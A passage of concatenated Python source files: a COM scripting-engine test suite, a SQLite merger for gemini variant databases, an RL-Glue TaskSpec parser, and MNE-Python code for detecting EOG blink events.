self.failUnlessEqual(ctx, 123)
def testCOMException(self):
code = "test.fail()"
self.parseScriptText(code, expect_exc=True)
scode, hlp, desc, blah, blah, hresult = self.site.last_error.GetExceptionInfo()
self.failUnless(desc.startswith("COM Error"), desc)
def testSyntaxError(self, startLineNumber=0):
code = "\nfoo]\n"
self.parseScriptText(code, expect_exc=True, startLineNumber=startLineNumber)
scode, hlp, desc, blah, blah, hresult = self.site.last_error.GetExceptionInfo()
self.failUnless(desc.startswith("Syntax"), desc)
# we aren't expecting a traceback, as it would only be to the
# compiler itself - so no \n chars are expected.
self.failIf('\n' in desc, desc)
ctx, line, col = self.site.last_error.GetSourcePosition()
self.failUnlessEqual(line, startLineNumber+1) # zero based
# no column available :( ...
def testSyntaxErrorAdjusted(self):
self.testSyntaxError(startLineNumber=1)
def testFilename(self):
# Make sure the 'filename' of our script block is reported in both
# syntax and normal errors.
self.parseScriptText("foo=bar", expect_exc=True)
scode, hlp, desc, blah, blah, hresult = self.site.last_error.GetExceptionInfo()
self.failUnless("<script 0>" in desc, desc)
# and do another one with a syntax error - and different name
self.parseScriptText("x]", sourceContextCookie=3, expect_exc=True)
scode, hlp, desc, blah, blah, hresult = self.site.last_error.GetExceptionInfo()
self.failUnless("<script 3>" in desc, desc)
class TestScriptDispatch(TestCaseInitialized):
# Test the IDispatch impls handed out by Tamarin.
# Note that in general, we avoid the pretty 'Dispatch' wrappers provided
# by the pywin32 package, to avoid obscuring tracebacks etc with the
# implementation details of those wrappers.
def testDispatchSimple(self):
code = "test.expando = 'hello'"
disp = self.site.engine_script.GetScriptDispatch('test')
# name should not exist.
self.assertRaisesCOMError(disp.GetIDsOfNames, 0, 'expando', hresult=winerror.DISP_E_UNKNOWNNAME)
# Now execute the script code, which will define the name
self.parseScriptText(code)
lcid = 0
dispid = disp.GetIDsOfNames(lcid, 'expando')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET,
True) # do we want a result?
self.failUnlessEqual(ret, 'hello')
# and there should not be a property named 'expando' on the raw
# IDispatch - Tamarin should have created it and been handing out
# the dispid for it.
self.failIf(hasattr(self.test_script_ob, 'expando'))
def testDispatchCall(self):
code = "function f(arg1, arg2, arg3) { return arg1 + arg2 + arg3}; test.expando_func = f;"
disp = self.site.engine_script.GetScriptDispatch('test')
# name should not exist.
self.assertRaisesCOMError(disp.GetIDsOfNames, 0, 'expando',
hresult=winerror.DISP_E_UNKNOWNNAME)
# Now execute the script code, which will define the name
self.parseScriptText(code)
lcid = 0
dispid = disp.GetIDsOfNames(lcid, 'expando_func')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_METHOD,
True, # do we want a result?
'hello ', 'there ', 'Mark')
self.failUnlessEqual(ret, 'hello there Mark')
def testDispatchSub(self):
lcid = 0
code = "test.expando = {}\ntest.expando.sub = 'foo'"
disp_test = self.site.engine_script.GetScriptDispatch('test')
self.parseScriptText(code)
# getting the 'expando' object should give us a generic wrapper
# around a ScriptObject, which comes back as an IDispatch.
id_expando = disp_test.GetIDsOfNames(lcid, 'expando')
disp_expando = disp_test.Invoke(id_expando, lcid, pythoncom.DISPATCH_PROPERTYGET, True)
id_sub = disp_expando.GetIDsOfNames(0, 'sub')
val = disp_expando.Invoke(id_sub, lcid, pythoncom.DISPATCH_PROPERTYGET, True)
self.failUnlessEqual(val, 'foo')
def testDispatchLikeVBScript(self):
# vbscript calls all properties with DISPATCH_METHOD|DISPATCH_PROPERTYGET
# as its syntax can't tell the difference. So test that.
lcid = 0
code = """
test.expando = 'hello'
function f(arg1, arg2, arg3) { return arg1 + arg2 + arg3}
test.expando_func = f
function f2() { return 'hello there'}
test.expando_func2 = f2
"""
self.parseScriptText(code)
disp = self.site.engine_script.GetScriptDispatch('test')
flags = pythoncom.DISPATCH_PROPERTYGET | pythoncom.DISPATCH_METHOD
# fetch the expando property
dispid = disp.GetIDsOfNames(lcid, 'expando')
ret = disp.Invoke(dispid, lcid, flags, True)
self.failUnlessEqual(ret, 'hello')
# call the expando function
dispid = disp.GetIDsOfNames(lcid, 'expando_func')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET | pythoncom.DISPATCH_METHOD,
True, # do we want a result?
'hello ', 'there ', 'Mark')
self.failUnlessEqual(ret, 'hello there Mark')
# and so a workaround in our code isn't forgotten...
# call the expando function that takes no params
if not skip_known_failures:
dispid = disp.GetIDsOfNames(lcid, 'expando_func2')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET | pythoncom.DISPATCH_METHOD,
True) # do we want a result?
self.failUnlessEqual(ret, 'hello there')
def testDispatchRemembered(self):
# Check that a single ScriptObject is used for the same IDispatch
# pointer.
# This works "by accident" - the top-level names are cached by
# the impl. See the test below, which uses children of the
# top-level names, which tests our cache of all seen IDispatch obs.
code = "test.expando = 'hello'"
disp = self.site.engine_script.GetScriptDispatch('test')
# name should not exist.
self.assertRaisesCOMError(disp.GetIDsOfNames, 0, 'expando', hresult=winerror.DISP_E_UNKNOWNNAME)
# Now execute the script code, which will define the name
self.parseScriptText(code)
lcid = 0
dispid = disp.GetIDsOfNames(lcid, 'expando')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET,
True) # do we want a result?
self.failUnlessEqual(ret, 'hello')
# and fetch it again - should still get 'hello'
disp = self.site.engine_script.GetScriptDispatch('test')
dispid = disp.GetIDsOfNames(lcid, 'expando')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET,
True) # do we want a result?
self.failUnlessEqual(ret, 'hello')
def testDispatchRememberedSub(self):
# Check that a single ScriptObject is used for the same IDispatch
# pointer for an object other than a top-level "named item".
# set .value to an IDispatch object, and set an expando on that.
self.test_script_ob.value = wrap(TestScriptObject())
code = "test.value.expando = 'hello'"
# Now execute the script code, which will define the name
self.parseScriptText(code)
# damn - no expressions yet - so execute code that will fail if
# our condition is wrong.
self.parseScriptText("if (test.value.expando != 'hello') throw('wrong - got ' + test.value.expando);")
def testDispatchEquality(self):
self.test_script_ob.value = wrap(TestScriptObject())
code = "test.value.expando = 'hello'"
# Now execute the script code, which will define the name
self.parseScriptText(code)
# damn - no expressions yet - so execute code that will fail if
# our condition is wrong.
self.parseScriptText("if (test.value != test.value) throw('wrong - equality failed!');")
self.parseScriptText("if (!(test.value === test.value)) throw('wrong - identity failed!');")
def testDispatchList(self):
# No eval - so have script code throw exception on failure.
for code in ("if (test.list[0] != 'One') throw test.list[0]",
"if (test.list[1] != 2) throw test.list[1]",
"if (test.list[2] != 'Three') throw test.list[1]",
):
self.parseScriptText(code)
# tests specific to IDispatchEx
class TestScriptDispatchEx(TestCaseInitialized):
def testCreateExpando(self):
# Create an expando via the IDispatchEx interface
disp = self.site.engine_script.GetScriptDispatch('test')
disp = disp.QueryInterface(pythoncom.IID_IDispatchEx)
# name should not exist.
self.assertRaisesCOMError(disp.GetIDsOfNames, 0, 'expando',
hresult=winerror.DISP_E_UNKNOWNNAME)
# Now define it
lcid = 0
dispid = disp.GetDispID('expando', pythoncom.fdexNameEnsure)
# should be undefined.
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET,
True) # do we want a result?
self.failUnlessEqual(ret, None)
# set it
disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYPUT,
False, # do we want a result?
'hello')
# get it
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET,
True) # do we want a result?
self.failUnlessEqual(ret, 'hello')
class TestDispatchConsumer(TestCaseInitialized):
def testExpando(self):
code = "test.expando = 'new value'"
self.parseScriptText(code)
# todo: check the new value - but how to do that (we don't have
# SCRIPTTEXT_ISEXPRESSION working yet)
def testCall(self):
self.parseScriptText("test.call()")
self.failUnlessEqual(self.test_script_ob.last_call_args, ())
self.parseScriptText("test.call('foo')")
self.failUnlessEqual(self.test_script_ob.last_call_args, ('foo',))
self.parseScriptText("test.call('foo', 'bar')")
self.failUnlessEqual(self.test_script_ob.last_call_args, ('foo', 'bar'))
def testDefaults(self):
# check a 'vanilla' DispatchConsumer can be converted to a string
self.parseScriptText("test.value='hello ' + test")
self.failUnless(self.test_script_ob.value.startswith('hello '))
if __name__=='__main__':
try:
pythoncom.CoCreateInstance(AXTAM_CLSID, None, pythoncom.CLSCTX_SERVER,
pythoncom.IID_IUnknown)
# cool - no problem - we can continue
except pythoncom.error, details:
print >> sys.stderr, "The axtam engine has not been registered - cannot execute tests"
sys.exit(1)
unittest.main()
|
|
#!/usr/bin/env python
import os
import shutil
import sqlite3
import sys
import uuid
import database as gemini_db
import gemini_load_chunk
def append_variant_info(main_curr, chunk_db):
"""
Append the variant and variant_info data from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
main_curr.execute("BEGIN TRANSACTION")
cmd = "INSERT INTO variants SELECT * FROM toMerge.variants"
main_curr.execute(cmd)
cmd = \
"INSERT INTO variant_impacts SELECT * FROM toMerge.variant_impacts"
main_curr.execute(cmd)
main_curr.execute("END TRANSACTION")
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_sample_genotype_counts(main_curr, chunk_db):
"""
Append the sample_genotype_counts from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO sample_genotype_counts \
SELECT * FROM toMerge.sample_genotype_counts"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_sample_info(main_curr, chunk_db):
"""
Append the sample info from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "create table samples as select * from toMerge.samples where 1=0"
main_curr.execute(cmd)
cmd = "INSERT INTO samples SELECT * FROM toMerge.samples"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_resource_info(main_curr, chunk_db):
"""
Append the resource info from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO resources SELECT * FROM toMerge.resources"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_version_info(main_curr, chunk_db):
"""
Append the version info from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO version SELECT * FROM toMerge.version"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_vcf_header(main_curr, chunk_db):
"""
Append the vcf_header from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO vcf_header SELECT * FROM toMerge.vcf_header"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_gene_summary(main_curr, chunk_db):
"""
Append the gene_summary from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO gene_summary SELECT * FROM toMerge.gene_summary"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_gene_detailed(main_curr, chunk_db):
"""
Append the gene_detailed from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO gene_detailed SELECT * FROM toMerge.gene_detailed"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def update_sample_genotype_counts(main_curr, chunk_db):
"""
Update the main sample_genotype_counts table with the
counts observed in one of the chunked databases (chunk_db)
"""
curr_db_conn = sqlite3.connect(chunk_db)
curr_db_conn.isolation_level = None
curr_db_conn.row_factory = sqlite3.Row
curr_db_curr = curr_db_conn.cursor()
cmd = "SELECT sample_id, num_hom_ref, \
num_het, num_hom_alt, \
num_unknown FROM sample_genotype_counts"
curr_db_curr.execute(cmd)
for row in curr_db_curr:
main_curr.execute("""UPDATE sample_genotype_counts
SET num_hom_ref = num_hom_ref + ?,
num_het = num_het + ?,
num_hom_alt = num_hom_alt + ?,
num_unknown = num_unknown + ?
WHERE sample_id= ? """,
(row['num_hom_ref'],
row['num_het'],
row['num_hom_alt'],
row['num_unknown'],
row['sample_id']))
curr_db_curr.close()
def merge_db_chunks(args):
# open up a new database
if os.path.exists(args.db):
os.remove(args.db)
gemini_db.create_tables(args.db, gemini_load_chunk.get_extra_effects_fields(args) if args.vcf else [])
main_conn = sqlite3.connect(args.db)
main_conn.isolation_level = None
main_curr = main_conn.cursor()
main_curr.execute('PRAGMA synchronous = OFF')
main_curr.execute('PRAGMA journal_mode=MEMORY')
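    # Editorial note: these PRAGMAs trade crash safety for bulk-load speed,
    # presumably acceptable here because the merged database can simply be
    # rebuilt from the chunk databases if the process is interrupted.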
databases = []
for database in args.chunkdbs:
databases.append(database)
for idx, database in enumerate(databases):
db = database[0]
append_variant_info(main_curr, db)
# we only need to add these tables from one of the chunks.
if idx == 0:
append_sample_genotype_counts(main_curr, db)
append_sample_info(main_curr, db)
append_resource_info(main_curr, db)
append_version_info(main_curr, db)
append_vcf_header(main_curr, db)
append_gene_summary(main_curr, db)
append_gene_detailed(main_curr, db)
else:
update_sample_genotype_counts(main_curr, db)
if args.index:
gemini_db.create_indices(main_curr)
main_conn.commit()
main_curr.close()
def merge_chunks(parser, args):
errors = []
for try_count in range(2):
try:
if try_count > 0:
tmp_dbs = [os.path.join(args.tempdir, "%s.db" % uuid.uuid4())
for _ in args.chunkdbs]
for chunk_db, tmp_db in zip(args.chunkdbs, tmp_dbs):
shutil.copyfile(chunk_db[0], tmp_db)
chunk_db[0] = tmp_db
output_db = args.db
args.db = os.path.join(args.tempdir, "%s.db" % uuid.uuid4())
merge_db_chunks(args)
if try_count > 0:
shutil.move(args.db, output_db)
for tmp_db in tmp_dbs:
os.remove(tmp_db)
break
except sqlite3.OperationalError, e:
errors.append(str(e))
sys.stderr.write("sqlite3.OperationalError: %s\n" % e)
else:
raise Exception("Attempted workaround for SQLite locking issue on NFS "
"drives has failed. One possible reason is that the temp directory "
"%s is also on an NFS drive. Error messages from SQLite: %s"
% (args.tempdir, " ".join(errors)))
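# Illustrative sketch (editorial addition, not part of the original module).
# merge_chunks() expects an argparse-style namespace; the attribute names used
# below (db, chunkdbs, tempdir, index, vcf) are inferred from the code above
# and may not match the real gemini CLI exactly:
#
#     from argparse import Namespace
#     args = Namespace(db="merged.db",
#                      chunkdbs=[["chunk0.db"], ["chunk1.db"]],
#                      tempdir="/tmp",
#                      index=True,
#                      vcf=None)
#     merge_chunks(parser=None, args=args)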
|
|
#
# Copyright (C) 2009, Jose Antonio Martin H.
#
#http://rl-glue-ext.googlecode.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# $Revision: 465 $
# $Date: 2009-01-28 19:55:32 -0700 (Wed, 28 Jan 2009) $
# $Author: xjamartinh $
# $HeadURL: http://rl-glue-ext.googlecode.com/svn/trunk/projects/codecs/Python/src/rlglue/utils/TaskSpecVRLGLUE3.py $
"""
Brian Tanner: The license above is what matters most. I think you can all
take the comments below as non-binding suggestions ;)
This file was written by Jose Antonio Martin H. for the RL-Glue Extensions project.
You are allowed to use it (and see it) fully, subject to the following conditions:
1. do not cause damage to any person
2. do not use it to earn money except when you give me 50%
3. use it to produce a state-of-the-art RL agent; if not, think a lot and then come back to write a super agent.
This code is a 'parser' for the RL-Glue 3.0 TaskSpec.
It does not duplicate any information, that is, what you get is always a view of the original string.
This is not the classic state-machine or automata approach to parsing languages, so in particular you will see that
the parser is robust to a large set of taskspec string malformations while still extracting the right information.
Last modified 22-1-2009 by Jose Antonio Martin H.
Added enforced parsing error catching.
"""
import sys
try:
import psyco
psyco.full()
except ImportError:
pass
class TaskSpecParser:
"""
    RL-Glue TaskSpec Parser V3
"""
# BEGIN: change made by: Akshay Narayan (06-01-2015:1200)
#w = ["VERSION","PROBLEMTYPE","DISCOUNTFACTOR", "OBSERVATIONS","ACTIONS","REWARDS","EXTRA"]
# w[0] = VERSION ... w[7] = NUMOFOBJECTIVES
w = ["VERSION", "PROBLEMTYPE", "DISCOUNTFACTOR", "OBSERVATIONS", "ACTIONS", "REWARDS", "NUMOFOBJECTIVES", "EXTRA"]
# END: change made by: Akshay Narayan (06-01-2015:1200)
v = ["INTS","DOUBLES","CHARCOUNT"]
expected_version = "RL-Glue-3.0"
valid = True
last_error = ""
def __init__(self,ts):
self.ts = ts
if self.expected_version != self.getVersion():
print ("Warning: TaskSpec Version is not "+self.expected_version+" but "+self.getVersion())
self.valid = False
        while self.ts.find("  ") != -1:
            self.ts = self.ts.replace("  ", " ")
def getVersion(self):
a = len(self.w[0])+1
return self.ts[a:self.ts.find(" ",a)]
def Validate(self):
if not self.valid:
print ("Warning: TaskSpec String is invalid: "+self.last_error)
return False
return True
def getValue(self,i,ts,w):
try:
a = ts.index(w[i]) + len(w[i]) + 1
except: #ValueError:
#raise AttributeError("Malformed TaskSpec String: could not find the "+w[i]+" keyword")
self.last_error = "could not find the "+w[i]+" keyword"
print ("Warning: Malformed TaskSpec String: " +self.last_error)
self.valid = False
return ""
b=None
if (i+1)<len(w):
try:
b = ts.index(w[i+1])-1
except: #ValueError:
#raise AttributeError("Malformed TaskSpec String: could not find the "+w[i+1]+" keyword")
self.last_error = "could not find the "+w[i+1]+" keyword"
print ("Warning: Malformed TaskSpec String: " +self.last_error)
self.valid = False
return ""
return ts[a:b].strip()
def getProblemType(self):
if not self.Validate():
return ""
return self.getValue(1,self.ts,self.w)
def getDiscountFactor(self):
if not self.Validate():
return ""
return float(self.getValue(2,self.ts,self.w))
    def CompleteVars(self, str_in):
        """Force the variable block to contain INTS, DOUBLES and CHARCOUNT."""
        if not self.Validate():
            return ""
if self.v[0] not in str_in:
str_in = self.v[0]+" (0 0 0) " + str_in
if self.v[2] not in str_in:
str_in= str_in.rstrip()+" "+self.v[2]+" 0 "
if self.v[1] not in str_in:
i = str_in.find(self.v[2])
str_in= str_in[0:i]+self.v[1]+" (0 0 0) "+str_in[i:]
return str_in
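    # Example (editorial, for illustration only):
    #   CompleteVars("DOUBLES (0 1.0 2.0)") returns
    #   "INTS (0 0 0) DOUBLES (0 1.0 2.0) CHARCOUNT 0 ", so later parsing can
    #   always rely on all three keywords being present.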
def getObservations(self):
if not self.Validate():
return ""
str_o = self.getValue(3,self.ts,self.w)
return self.CompleteVars(str_o)
def getActions(self):
if not self.Validate():
return ""
str_a = self.getValue(4,self.ts,self.w)
return self.CompleteVars(str_a)
def getReward(self):
if not self.Validate():
return ""
return self.getValue(5,self.ts,self.w)
# BEGIN: change made by: Akshay Narayan (06-01-2015:1209)
def getNumOfObjectives(self):
if not self.Validate():
return ""
return int(self.getValue(6, self.ts, self.w))
# END: change made by: Akshay Narayan (06-01-2015:1209)
def getExtra(self):
if not self.Validate():
return ""
# BEGIN: change made by: Akshay Narayan (06-01-2015:1237)
#return self.getValue(6,self.ts,self.w)
return self.getValue(7,self.ts,self.w)
# END: change made by: Akshay Narayan (06-01-2015:1237)
    def isSpecial(self, maxOrMin):
        if not isinstance(maxOrMin, str):
            return False
        return maxOrMin in ("UNSPEC", "NEGINF", "POSINF")
def getRange(self,str_input):
if not self.Validate():
return ""
try:
str_input = str_input.replace("UNSPEC","'UNSPEC'")
str_input = str_input.replace("NEGINF","'NEGINF'")
str_input = str_input.replace("POSINF","'POSINF'")
str_input = str_input.replace(" ",",")
r = eval(str_input)
if len(r)==2:
return [list(r)]
out = r[0]*([[r[1],r[2]]])
return out
except:
self.last_error = "error ocurred while parsing a Range in "+str_input
print ("Warning: Malformed TaskSpec String: " +self.last_error)
print (sys.exc_info())
self.valid = False
return ""
def getRewardRange(self):
if not self.Validate():
return ""
str_reward = self.getReward()
return self.getRange(str_reward)
def getVarInfoRange(self,i,ts,w):
self.Validate()
a = ts.index(w[i])
b = ts.index(w[i+1])+1
return ts[a:b]
def GetVarValue(self,i,str_o):
if not self.Validate():
return ""
str_r = self.getValue(i,str_o,self.v)
str_r = str_r.replace(") (",")#(")
# Ok I can parse it but this (there is no space or there is an extra space in ranges)
# should be checked since this means that the taskspec is malformed
str_r = str_r.replace("( ","(")
str_r = str_r.replace(" )",")")
str_r = str_r.replace(")(",")#(")
parts = str_r.split("#")
obs=[]
for p in parts:
obs.extend(self.getRange(p))
return obs
def getIntObservations(self):
if not self.Validate():
return ""
return self.GetVarValue(0,self.getObservations())
def getDoubleObservations(self):
if not self.Validate():
return ""
return self.GetVarValue(1,self.getObservations())
def getCharCountObservations(self):
if not self.Validate():
return ""
str_o = self.getObservations()
return int(self.getValue(2,str_o,self.v))
def getIntActions(self):
if not self.Validate():
return ""
return self.GetVarValue(0,self.getActions())
def getDoubleActions(self):
if not self.Validate():
return ""
return self.GetVarValue(1,self.getActions())
def getCharCountActions(self):
if not self.Validate():
return ""
str_a = self.getActions()
return int(self.getValue(2,str_a,self.v))
def test():
    # The taskspec string may be split across lines at the main keywords.
# BEGIN: change made by: Akshay Narayan (06-01-2015:1230)
#ts ="""VERSION RL-Glue-3.0 PROBLEMTYPE episodic DISCOUNTFACTOR .7 OBSERVATIONS INTS (NEGINF 1) ( 2 -5 POSINF ) DOUBLES (2 -1.2 0.5 )(-.07 .07) (UNSPEC 3.3) (0 100.5) CHARCOUNT 32
# ACTIONS INTS (5 0 4) DOUBLES (-.5 2) (2 7.8 9) (NEGINF UNSPEC) REWARDS (-5.0 5.0) EXTRA some other stuff goes here"""
ts ="""VERSION RL-Glue-3.0 PROBLEMTYPE episodic DISCOUNTFACTOR .7 OBSERVATIONS INTS (NEGINF 1) ( 2 -5 POSINF ) DOUBLES (2 -1.2 0.5 )(-.07 .07) (UNSPEC 3.3) (0 100.5) CHARCOUNT 32
ACTIONS INTS (5 0 4) DOUBLES (-.5 2) (2 7.8 9) (NEGINF UNSPEC) REWARDS (-5.0 5.0) NUMOFOBJECTIVES 3 EXTRA some other stuff goes here"""
# END: change made by: Akshay Narayan (06-01-2015:1230)
print (ts)
print ()
print ()
TaskSpec = TaskSpecParser(ts)
if TaskSpec.valid:
print ("=======================================================================================================")
print ("Version: ["+TaskSpec.getVersion()+"]")
print ("ProblemType: ["+TaskSpec.getProblemType()+"]")
print ("DiscountFactor: ["+str(TaskSpec.getDiscountFactor())+"]")
print ("=======================================================================================================")
# BEGIN: change made by: Akshay Narayan (06-01-2015:1228)
print ("Number of objectives: ["+str(TaskSpec.getNumOfObjectives())+"]")
# END: change made by: Akshay Narayan (06-01-2015:1228)
print ("=======================================================================================================")
print ("\t \t \t \t Observations")
print ("=======================================================================================================")
print ("Observations: ["+TaskSpec.getObservations()+"]")
print ("Integers:",TaskSpec.getIntObservations())
print ("Doubles: ",TaskSpec.getDoubleObservations())
print ("Chars: ",TaskSpec.getCharCountObservations())
print ("=======================================================================================================")
print ("\t \t \t \t Actions")
print ("======================================================================================================")
print ("Actions: ["+TaskSpec.getActions()+"]")
print ("Integers:",TaskSpec.getIntActions())
print ("Doubles: ",TaskSpec.getDoubleActions())
print ("Chars: ",TaskSpec.getCharCountActions())
print ("=======================================================================================================")
print ("Reward :["+TaskSpec.getReward()+"]")
print ("Reward Range:",TaskSpec.getRewardRange())
print ("Extra: ["+TaskSpec.getExtra()+"]")
print ("remember that by using len() you get the cardinality of lists!")
print ("Thus:")
print ("len(",TaskSpec.getDoubleObservations(),") ==> ",len(TaskSpec.getDoubleObservations())," Double Observations")
        print (TaskSpec.isSpecial("NEGINF"))
if __name__=="__main__":
test()
|
|
# Authors: Alexandre Gramfort <[email protected]>
# Denis Engemann <[email protected]>
# Eric Larson <[email protected]>
#
# License: BSD (3-clause)
import numpy as np
from .peak_finder import peak_finder
from .. import pick_types, pick_channels
from ..utils import logger, verbose
from ..filter import band_pass_filter
from ..epochs import Epochs
from ..externals.six import string_types
@verbose
def find_eog_events(raw, event_id=998, l_freq=1, h_freq=10,
filter_length='10s', ch_name=None, tstart=0,
verbose=None):
"""Locate EOG artifacts
Parameters
----------
raw : instance of Raw
The raw data.
event_id : int
The index to assign to found events.
l_freq : float
Low cut-off frequency in Hz.
h_freq : float
High cut-off frequency in Hz.
filter_length : str | int | None
Number of taps to use for filtering.
    ch_name : str | None
If not None, use specified channel(s) for EOG
tstart : float
Start detection after tstart seconds.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
eog_events : array
Events.
"""
# Getting EOG Channel
eog_inds = _get_eog_channel_index(ch_name, raw)
logger.info('EOG channel index for this subject is: %s' % eog_inds)
eog, _ = raw[eog_inds, :]
eog_events = _find_eog_events(eog, event_id=event_id, l_freq=l_freq,
h_freq=h_freq,
sampling_rate=raw.info['sfreq'],
first_samp=raw.first_samp,
filter_length=filter_length,
tstart=tstart)
return eog_events
def _find_eog_events(eog, event_id, l_freq, h_freq, sampling_rate, first_samp,
filter_length='10s', tstart=0.):
"""Helper function"""
logger.info('Filtering the data to remove DC offset to help '
'distinguish blinks from saccades')
    # Filter to remove the DC offset so that blinks can be distinguished from saccades.
fmax = np.minimum(45, sampling_rate / 2.0 - 0.75) # protect Nyquist
filteog = np.array([band_pass_filter(
x, sampling_rate, 2, fmax, filter_length=filter_length,
l_trans_bandwidth=0.5, h_trans_bandwidth=0.5, phase='zero-double',
fir_window='hann') for x in eog])
temp = np.sqrt(np.sum(filteog ** 2, axis=1))
indexmax = np.argmax(temp)
# easier to detect peaks with filtering.
filteog = band_pass_filter(
eog[indexmax], sampling_rate, l_freq, h_freq,
filter_length=filter_length, l_trans_bandwidth=0.5,
h_trans_bandwidth=0.5, phase='zero-double', fir_window='hann')
# detecting eog blinks and generating event file
logger.info('Now detecting blinks and generating corresponding events')
temp = filteog - np.mean(filteog)
n_samples_start = int(sampling_rate * tstart)
if np.abs(np.max(temp)) > np.abs(np.min(temp)):
eog_events, _ = peak_finder(filteog[n_samples_start:], extrema=1)
else:
eog_events, _ = peak_finder(filteog[n_samples_start:], extrema=-1)
eog_events += n_samples_start
n_events = len(eog_events)
logger.info("Number of EOG events detected : %d" % n_events)
eog_events = np.array([eog_events + first_samp,
np.zeros(n_events, int),
event_id * np.ones(n_events, int)]).T
return eog_events
def _get_eog_channel_index(ch_name, inst):
if isinstance(ch_name, string_types):
# Check if multiple EOG Channels
if ',' in ch_name:
ch_name = ch_name.split(',')
else:
ch_name = [ch_name]
eog_inds = pick_channels(inst.ch_names, include=ch_name)
if len(eog_inds) == 0:
raise ValueError('%s not in channel list' % ch_name)
else:
logger.info('Using channel %s as EOG channel%s' % (
" and ".join(ch_name),
'' if len(eog_inds) < 2 else 's'))
elif ch_name is None:
eog_inds = pick_types(inst.info, meg=False, eeg=False, stim=False,
eog=True, ecg=False, emg=False, ref_meg=False,
exclude='bads')
if len(eog_inds) == 0:
logger.info('No EOG channels found')
logger.info('Trying with EEG 061 and EEG 062')
eog_inds = pick_channels(inst.ch_names,
include=['EEG 061', 'EEG 062'])
if len(eog_inds) != 2:
raise RuntimeError('EEG 61 or EEG 62 channel not found !!')
else:
raise ValueError('Could not find EOG channel.')
return eog_inds
@verbose
def create_eog_epochs(raw, ch_name=None, event_id=998, picks=None,
tmin=-0.5, tmax=0.5, l_freq=1, h_freq=10,
reject=None, flat=None, baseline=None,
preload=True, verbose=None):
"""Conveniently generate epochs around EOG artifact events
Parameters
----------
raw : instance of Raw
The raw data
ch_name : str
The name of the channel to use for EOG peak detection.
The argument is mandatory if the dataset contains no EOG channels.
event_id : int
The index to assign to found events
picks : array-like of int | None (default)
Indices of channels to include (if None, all channels
are used).
tmin : float
Start time before event.
tmax : float
End time after event.
l_freq : float
        Low cut-off frequency in Hz.
    h_freq : float
        High cut-off frequency in Hz.
reject : dict | None
Rejection parameters based on peak-to-peak amplitude.
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg'.
If reject is None then no rejection is done. Example::
reject = dict(grad=4000e-13, # T / m (gradiometers)
mag=4e-12, # T (magnetometers)
eeg=40e-6, # V (EEG channels)
eog=250e-6 # V (EOG channels)
)
flat : dict | None
Rejection parameters based on flatness of signal.
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg', and values
are floats that set the minimum acceptable peak-to-peak amplitude.
If flat is None then no rejection is done.
baseline : tuple or list of length 2, or None
The time interval to apply rescaling / baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
        If baseline is equal to (None, None) all the time
interval is used. If None, no correction is applied.
preload : bool
Preload epochs or not.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
eog_epochs : instance of Epochs
Data epoched around EOG events.
"""
events = find_eog_events(raw, ch_name=ch_name, event_id=event_id,
l_freq=l_freq, h_freq=h_freq)
# create epochs around EOG events
eog_epochs = Epochs(raw, events=events, event_id=event_id,
tmin=tmin, tmax=tmax, proj=False, reject=reject,
flat=flat, picks=picks, baseline=baseline,
preload=preload, add_eeg_ref=False)
return eog_epochs
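# Illustrative sketch (editorial addition, not part of the original module).
# The file name and EOG channel name below are assumptions; any Raw instance
# with an EOG channel would do:
#
#     import mne
#     raw = mne.io.read_raw_fif("sample_raw.fif", preload=True)
#     eog_events = find_eog_events(raw, ch_name="EOG 061")
#     eog_epochs = create_eog_epochs(raw, ch_name="EOG 061", tmin=-0.5, tmax=0.5)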
|
|
import time
from copy import deepcopy
